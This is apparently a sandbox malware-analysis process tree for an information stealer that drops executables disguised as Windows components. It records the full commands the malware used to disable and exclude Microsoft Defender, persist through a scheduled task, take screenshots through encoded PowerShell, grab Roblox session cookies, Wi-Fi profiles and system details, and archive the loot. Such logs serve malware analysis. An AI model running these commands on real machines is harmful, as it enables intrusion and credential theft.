C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"11⤵
- Executes dropped EXE
PID:5220 -
C:\Users\Admin\Windows Driver Foundation.exe"C:\Users\Admin\Windows Driver Foundation.exe"9⤵
- Executes dropped EXE
PID:4636 -
C:\Users\Admin\Windows Service Wrapper.exe"C:\Users\Admin\Windows Service Wrapper.exe"9⤵
- Executes dropped EXE
PID:6828 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"9⤵
- Executes dropped EXE
PID:6832 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"10⤵
- Executes dropped EXE
PID:7064 -
C:\Users\Admin\Windows Driver Foundation.exe"C:\Users\Admin\Windows Driver Foundation.exe"8⤵
- Executes dropped EXE
PID:5372 -
C:\Users\Admin\Windows Service Wrapper.exe"C:\Users\Admin\Windows Service Wrapper.exe"8⤵
- Executes dropped EXE
PID:5436 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"8⤵
- Executes dropped EXE
PID:4336 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"9⤵
- Executes dropped EXE
PID:6444 -
C:\Users\Admin\Windows Driver Foundation.exe"C:\Users\Admin\Windows Driver Foundation.exe"7⤵
- Executes dropped EXE
PID:6020 -
C:\Users\Admin\Windows Service Wrapper.exe"C:\Users\Admin\Windows Service Wrapper.exe"7⤵
- Executes dropped EXE
PID:6080 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"7⤵
- Executes dropped EXE
PID:6100 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"8⤵
- Executes dropped EXE
PID:3984 -
C:\Users\Admin\Windows Driver Foundation.exe"C:\Users\Admin\Windows Driver Foundation.exe"6⤵
- Executes dropped EXE
PID:1584 -
C:\Users\Admin\Windows Service Wrapper.exe"C:\Users\Admin\Windows Service Wrapper.exe"6⤵
- Executes dropped EXE
PID:2196 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"6⤵
- Executes dropped EXE
PID:316 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"7⤵
- Executes dropped EXE
PID:5432 -
C:\Users\Admin\Windows Driver Foundation.exe"C:\Users\Admin\Windows Driver Foundation.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1084 -
C:\Users\Admin\Windows Service Wrapper.exe"C:\Users\Admin\Windows Service Wrapper.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:112 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5052 -
C:\Users\Admin\Windows Driver Foundation.exe"C:\Users\Admin\Windows Driver Foundation.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4744 -
C:\Users\Admin\Windows Service Wrapper.exe"C:\Users\Admin\Windows Service Wrapper.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2272 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4204 -
C:\Users\Admin\Windows Driver Foundation.exe"C:\Users\Admin\Windows Driver Foundation.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2032 -
C:\Users\Admin\Windows Service Wrapper.exe"C:\Users\Admin\Windows Service Wrapper.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4880 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:388 -
C:\Users\Admin\Windows Driver Foundation.exe"C:\Users\Admin\Windows Driver Foundation.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3680 -
C:\Users\Admin\Windows Service Wrapper.exe"C:\Users\Admin\Windows Service Wrapper.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
PID:4968 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows Service Wrapper.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Service Wrapper.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:7300 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Windows Service Wrapper.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:6012 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Service Wrapper.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:2244 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Service Wrapper" /tr "C:\Users\Public\Windows Service Wrapper.exe"3⤵
- Creates scheduled task(s)
PID:6948 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4908 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4748 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows SmartScreen.exe'"4⤵PID:2124
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows SmartScreen.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3344 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵PID:4396
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Suspicious behavior: EnumeratesProcesses
PID:6064 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"4⤵PID:4384
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2028 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:4916
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:5444 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:2552
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:5544 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵PID:2256
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵PID:5420
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵PID:4528
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Suspicious behavior: EnumeratesProcesses
PID:5224 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:112
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:4776 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:2244
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:4724
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵PID:5384
-
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵PID:5360
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵PID:5456
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:6248 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"4⤵PID:5500
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath5⤵PID:5356
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="4⤵PID:5568
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6452 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2xwdkq4z\2xwdkq4z.cmdline"6⤵PID:6084
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES922E.tmp" "c:\Users\Admin\AppData\Local\Temp\2xwdkq4z\CSC2B078AF23FCD44538542ECB923C85DB.TMP"7⤵PID:7332
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:6324
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:6244
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"4⤵PID:4360
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:7492 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:6872
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:8092
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"4⤵PID:7296
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:6100 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5116
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:4712
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:3788
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:3832 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5980
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:6148
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:4656
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5524
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"4⤵PID:8172
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5356
-
C:\Windows\system32\getmac.exegetmac5⤵PID:3032
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:6696
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵PID:644
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:5748
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵PID:3744
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI49082\rar.exe a -r -hp"L8Ot" "C:\Users\Admin\AppData\Local\Temp\C6bZm.zip" *"4⤵PID:2200
-
C:\Users\Admin\AppData\Local\Temp\_MEI49082\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI49082\rar.exe a -r -hp"L8Ot" "C:\Users\Admin\AppData\Local\Temp\C6bZm.zip" *5⤵PID:4348
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"4⤵PID:4240
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption5⤵PID:2088
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"4⤵PID:5364
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory5⤵PID:7568
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:6180
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:7280
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"4⤵PID:5556
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵PID:6168
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:7644
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:7088 -
